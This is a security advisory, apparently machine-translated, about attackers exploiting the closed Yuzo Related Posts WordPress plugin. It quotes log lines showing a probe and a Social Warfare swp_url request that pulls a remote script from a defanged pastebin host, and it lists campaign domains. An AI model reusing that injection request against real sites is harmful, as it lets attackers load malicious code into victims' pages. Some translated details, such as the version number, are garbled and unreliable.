Home Entertainment Attacks on closed WordPress plugins

Attacks on closed WordPress plugins

The WordPress plugin repository team can "plug in" plugins and limit downloads when they hear about a security issue that developers can not fix quickly.

However, bad actors actively monitor the WordPress plugin repository and pay close attention to these closed plugins. This can lead to massive attacks if the attacker can detect and exploit the vulnerability.

That's the case for the plugin Yuzo-related post execution 12/5/91 This was closed on March 30, so new users could not download it. But last time we looked 60,000+ active installations.

Yuzo-related post-plugin
Yuzo Related Post WordPress Plugin

Unfortunately, bad actors caused the sites to be searched for this plugin to see if it was installed:

140.143.195.86 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP / 1.1" - - "-" "Mozilla / 5.0 (Windows NT 6.1; Win64; x64; rv: 64.0) Gecko / 20100101 Firefox / 64.0 "

Addition to an existing malicious campaign

We recently reported how attackers abused multiple plugins by injecting malicious scripts into them. This is a typical, current example of how this Malare campaign targets websites with a vulnerable Social Warfare plug-in:

140.143.195.86 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps: // pastebin[.]de / raw / HeKe9uqn HTTP / 1.1 "- 0" - "" - "

We see that new domains are also used:

clevertrafficincome[.]com - Creation Date: 2019-04-05
Hellofromhony[.]org - Creation Date: 2019-04-09
notifymepush[.]info
Pushmeandtouchme[.]info

As we can see from the original IP address, this malware campaign has the Yuzo-related post Plugin into their list of goals.

Details of the vulnerability

especially the Yuzo-related post Plugin has one unauthenticated cross-site scripting Error. Several other vulnerabilities were also not resolved – this was the main reason why the WordPress team had closed it.

In order to give users time to remove this plugin from their websites, we do not provide any further details here. Remember that attackers are already exploiting it.

Today, April 10, 2019, we see many posts about hacks from sites using the plugin in the WordPress support forum. The plugin author even had to announce that the plugins should be uninstalled immediately.

Remove the Youzo post plugin immediately
Remove the Youzo post plugin immediately

If you can not remove this plugin, we recommend that you add a second level of security that virtually fixes vulnerabilities if developers do not solve the security issues.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Must Read

Powerful Arctic fires – fear fatal consequences – climate / weather

A huge fire is raging in the Arctic. These are huge fires that have fatal consequences for the permafrost and accelerate a climate vicious...

Disappearance of Steve in Nantes: the mayor asks Castaner for explanations

A month after the death of Steve Maia Caniço, 24, during the Music Festival against a backdrop of controversial intervention by police, the mayor...

Dragon of the summer now on the hunt

The Piper Super Cub is a nimble favorite of Alaska bush pilots who land on gravel bars and mountain tops and take off from...

Disappearance of Steve in Nantes: the mayor asks Castaner for explanations

A month after the death of Steve Maia Caniço, 24, during the Music Festival against a backdrop of controversial intervention by police, the mayor...

Highways will be free for firefighters in intervention

Dealer companies will provide specific electronic toll badges to firefighters, which they had to pay...